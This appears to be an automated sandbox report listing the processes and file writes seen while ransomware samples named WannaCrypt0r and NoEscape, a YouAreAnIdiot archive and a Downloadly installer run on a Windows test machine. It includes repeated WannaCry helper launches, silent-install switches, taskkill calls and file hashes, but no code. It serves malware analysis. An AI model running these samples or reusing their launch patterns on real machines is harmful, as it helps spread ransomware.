
taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe

taskdl.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff841823cb8,0x7ff841823cc8,0x7ff841823cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1964,17016562784917009708,445047318881724811,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2016 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1964,17016562784917009708,445047318881724811,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1964,17016562784917009708,445047318881724811,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2552 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,17016562784917009708,445047318881724811,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,17016562784917009708,445047318881724811,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,17016562784917009708,445047318881724811,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4908 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,17016562784917009708,445047318881724811,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4916 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1964,17016562784917009708,445047318881724811,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4672 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,17016562784917009708,445047318881724811,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4648 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,17016562784917009708,445047318881724811,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5156 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,17016562784917009708,445047318881724811,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5100 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,17016562784917009708,445047318881724811,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5516 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,17016562784917009708,445047318881724811,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5496 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1964,17016562784917009708,445047318881724811,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5712 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,17016562784917009708,445047318881724811,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5700 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,17016562784917009708,445047318881724811,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,17016562784917009708,445047318881724811,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4944 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1964,17016562784917009708,445047318881724811,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2336 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe

taskdl.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,17016562784917009708,445047318881724811,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5916 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1964,17016562784917009708,445047318881724811,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4544 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe

taskdl.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1964,17016562784917009708,445047318881724811,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1020 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe

taskdl.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,17016562784917009708,445047318881724811,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3596 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\Temp1_Downloadly.zip\x2s443bc.cs1.exe

"C:\Users\Admin\AppData\Local\Temp\Temp1_Downloadly.zip\x2s443bc.cs1.exe"

C:\Users\Admin\AppData\Local\Temp\is-VING0.tmp\x2s443bc.cs1.tmp

"C:\Users\Admin\AppData\Local\Temp\is-VING0.tmp\x2s443bc.cs1.tmp" /SL5="$502F4,15784509,779776,C:\Users\Admin\AppData\Local\Temp\Temp1_Downloadly.zip\x2s443bc.cs1.exe"

C:\Windows\SysWOW64\taskkill.exe

"C:\Windows\System32\taskkill.exe" /f /im Downloadly.exe

C:\Users\Admin\Programs\Downloadly\Downloadly.exe

"C:\Users\Admin\Programs\Downloadly\Downloadly.exe" EnablePro

C:\Users\Admin\Programs\Downloadly\MassiveInstaller.exe

C:\Users\Admin\Programs\Downloadly\MassiveInstaller.exe /SP- /VERYSILENT /NOICONS /SUPPRESSMSGBOXES /AllowStatusPage=false /ShowUI=false /DIR="C:\Users\Admin\Programs\Massive"

C:\Users\Admin\AppData\Local\Temp\is-0QSEL.tmp\MassiveInstaller.tmp

"C:\Users\Admin\AppData\Local\Temp\is-0QSEL.tmp\MassiveInstaller.tmp" /SL5="$30372,10474064,1082880,C:\Users\Admin\Programs\Downloadly\MassiveInstaller.exe" /SP- /VERYSILENT /NOICONS /SUPPRESSMSGBOXES /AllowStatusPage=false /ShowUI=false /DIR="C:\Users\Admin\Programs\Massive"

C:\Windows\SysWOW64\taskkill.exe

"C:\Windows\System32\taskkill.exe" /f /im Massive.exe

C:\Windows\SysWOW64\taskkill.exe

"C:\Windows\System32\taskkill.exe" /f /im MassiveUI.exe

C:\Users\Admin\Programs\Massive\Massive.exe

"C:\Users\Admin\Programs\Massive\Massive.exe"

C:\Users\Admin\Programs\Massive\crashpad_handler.exe

C:\Users\Admin\Programs\Massive\crashpad_handler.exe --no-rate-limit --database=C:\Users\Admin\AppData\Local\Massive\crashdumps --metrics-dir=C:\Users\Admin\AppData\Local\Massive\crashdumps --url=https://o428832.ingest.sentry.io:443/api/5375291/minidump/?sentry_client=sentry.native/0.4.9&sentry_key=5647f16acff64576af0bbfb18033c983 --attachment=C:\Users\Admin\AppData\Local\Massive\crashdumps\724bc23a-1868-45b8-bcc8-4c549b4eb69b.run\__sentry-event --attachment=C:\Users\Admin\AppData\Local\Massive\crashdumps\724bc23a-1868-45b8-bcc8-4c549b4eb69b.run\__sentry-breadcrumb1 --attachment=C:\Users\Admin\AppData\Local\Massive\crashdumps\724bc23a-1868-45b8-bcc8-4c549b4eb69b.run\__sentry-breadcrumb2 --initial-client-data=0x434,0x438,0x43c,0x410,0x440,0x7ff618692fe0,0x7ff618692fa0,0x7ff618692fb0

C:\Users\Admin\AppData\Local\Temp\Update-f05ff7f4-69af-41fd-8644-e7e8675ce157\downloadly_installer.exe

"C:\Users\Admin\AppData\Local\Temp\Update-f05ff7f4-69af-41fd-8644-e7e8675ce157\downloadly_installer.exe" /SP- /VERYSILENT /NOICONS /SUPPRESSMSGBOXES /LOG

C:\Users\Admin\AppData\Local\Temp\is-LVJ3B.tmp\downloadly_installer.tmp

"C:\Users\Admin\AppData\Local\Temp\is-LVJ3B.tmp\downloadly_installer.tmp" /SL5="$403B6,15992205,779776,C:\Users\Admin\AppData\Local\Temp\Update-f05ff7f4-69af-41fd-8644-e7e8675ce157\downloadly_installer.exe" /SP- /VERYSILENT /NOICONS /SUPPRESSMSGBOXES /LOG

C:\Users\Admin\AppData\Local\Temp\Update-9a174110-a467-4701-9b4d-55cbd1c46f5b\downloadly_installer.exe

"C:\Users\Admin\AppData\Local\Temp\Update-9a174110-a467-4701-9b4d-55cbd1c46f5b\downloadly_installer.exe" /SP- /VERYSILENT /NOICONS /SUPPRESSMSGBOXES /LOG

C:\Windows\SysWOW64\taskkill.exe

"C:\Windows\System32\taskkill.exe" /f /im Downloadly.exe

C:\Users\Admin\AppData\Local\Temp\is-F71EK.tmp\downloadly_installer.tmp

"C:\Users\Admin\AppData\Local\Temp\is-F71EK.tmp\downloadly_installer.tmp" /SL5="$503AE,15992205,779776,C:\Users\Admin\AppData\Local\Temp\Update-9a174110-a467-4701-9b4d-55cbd1c46f5b\downloadly_installer.exe" /SP- /VERYSILENT /NOICONS /SUPPRESSMSGBOXES /LOG

C:\Users\Admin\Programs\Downloadly\Downloadly.exe

"C:\Users\Admin\Programs\Downloadly\Downloadly.exe"

C:\Users\Admin\Programs\Downloadly\MassiveInstaller.exe

C:\Users\Admin\Programs\Downloadly\MassiveInstaller.exe /SP- /VERYSILENT /NOICONS /SUPPRESSMSGBOXES /AllowStatusPage=false /ShowUI=false /DIR="C:\Users\Admin\Programs\Massive"

C:\Users\Admin\AppData\Local\Temp\is-7MLHM.tmp\MassiveInstaller.tmp

"C:\Users\Admin\AppData\Local\Temp\is-7MLHM.tmp\MassiveInstaller.tmp" /SL5="$60284,10516965,1082880,C:\Users\Admin\Programs\Downloadly\MassiveInstaller.exe" /SP- /VERYSILENT /NOICONS /SUPPRESSMSGBOXES /AllowStatusPage=false /ShowUI=false /DIR="C:\Users\Admin\Programs\Massive"

C:\Windows\SysWOW64\taskkill.exe

"C:\Windows\System32\taskkill.exe" /f /im Massive.exe

C:\Windows\SysWOW64\taskkill.exe

"C:\Windows\System32\taskkill.exe" /f /im MassiveUI.exe

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe

taskdl.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,17016562784917009708,445047318881724811,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6452 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1964,17016562784917009708,445047318881724811,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6244 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\Temp1_NoEscape.zip\NoEscape.exe

"C:\Users\Admin\AppData\Local\Temp\Temp1_NoEscape.zip\NoEscape.exe"

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe

taskdl.exe

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x4 /state0:0xa3980855 /state1:0x41c64e6d

Network


Files

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

MD5 99914b932bd37a50b983c5e7c90ae93b
SHA1 bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA256 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA512 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 a107623eda97f0e4d696c6c96f034477
SHA1 c4093131bd158a3f985298ac690dc9a42f641e3c
SHA256 63fe436eb6bc84aa57b6e37d3a4ac374ac2a573c3f13172c34f32e79dae1ec63
SHA512 917d66490a3e232ed50b643043666b43f87ede5d885383cf6a10a562a18b0ab6867f38f8e20f44b7696a0b374111aa7adaabe132c7be817e9d9cc0bc36f8be87

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 467961f085fb93d58eec81af6c185420
SHA1 6a57e9a0fb0b87380c5e8874e0fd2e5f43203682
SHA256 0b7b58cae67fa4ad232aa8fdca78ebdc371ef4ec74c08e34a78b867c9aea7152
SHA512 370d0fee2d21dd64136beef0e9c913dc1ee316aa0aeaadb17cab08480e24da9bbab76cab4fbfae5011bb5865822d21678458f1aec7582ce71b342abcab3d5370

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 ae1bccd6831ebfe5ad03b482ee266e4f
SHA1 01f4179f48f1af383b275d7ee338dd160b6f558a
SHA256 1b11047e738f76c94c9d15ee981ec46b286a54def1a7852ca1ade7f908988649
SHA512 baf7ff6747f30e542c254f46a9678b9dbf42312933962c391b79eca6fcb615e4ba9283c00f554d6021e594f18c087899bc9b5362c41c0d6f862bba7fb9f83038

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt~RFe5a51da.TMP

MD5 c73a390a125e252cbf9ffd395ca40d9f
SHA1 89ed8d1ce3b8e3e7e193e58b1ea079ad3ba695ea
SHA256 07bb04369a67c3906ad7ddbef5ca0654d767bbd1df0d9c6607abcc2f4e57d323
SHA512 c3e10445f88ae1cdff386466b86b47b5ecc52adbc75ecfee2b886492bf47fd61bc1a01a8ab1ee0748720a369c3b31911493ee774efd487ec52590593ac6637de

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 7395637569f726cf8c33c7353dd2f8c1
SHA1 77a2f9a4d14334621a9a78fc8151d899cd015c7b
SHA256 e2a1db8db6f759aa4aa56f7c8d61f1a4b1264133992eefcfdb55a1b6b525c2cf
SHA512 6bca17be53596a1b33c9a65b0bda32f11bba2b2633de9539c332e963c4f9dbec77592411b6e8d70e6d8ef21fe1bf3bb282197f07ba43e16b071531f4678f3226

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 b32d947b85139959ec570264b0b63bed
SHA1 75e2a013dfbc009b7e01837f3a051fc4f5445780
SHA256 443b7606847aaef4ca556c010314ce1870cf0bbc1a0e6323a89a59a27714e2ab
SHA512 4d4a4565ee6470062e94961603e1c1fa79935e15a77abaa8e6f472837a01a35dddbd0614720fc7a0c70c166184b86d2f8078ac60f976ac83117a225742150df0

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\bad58dae-9ee4-4d6c-b64a-6cad8576ee4d.tmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

C:\Users\Admin\Downloads\YouAreAnIdiot.zip

C:\Users\Admin\Downloads\YouAreAnIdiot.zip:Zone.Identifier

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

C:\Users\Admin\Downloads\YouAreAnIdiot (1).zip:Zone.Identifier

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\temp-index

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe5b4a34.TMP

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

